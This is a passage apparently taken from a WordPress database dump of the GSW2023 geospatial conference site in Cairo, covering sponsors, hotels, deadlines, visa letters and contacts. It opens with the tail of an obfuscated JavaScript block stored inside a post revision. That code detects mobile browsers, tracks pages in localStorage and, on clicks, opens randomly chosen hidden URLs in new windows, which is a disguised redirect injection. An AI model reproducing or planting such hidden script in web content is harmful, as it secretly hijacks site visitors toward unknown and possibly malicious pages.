)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-20 00:06:17','2023-06-20 00:06:17','',3066,'https://gsw2023.com/?p=4720',0,'revision','',0),
(4721,1,'2023-06-20 00:09:38','2023-06-20 00:09:38','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 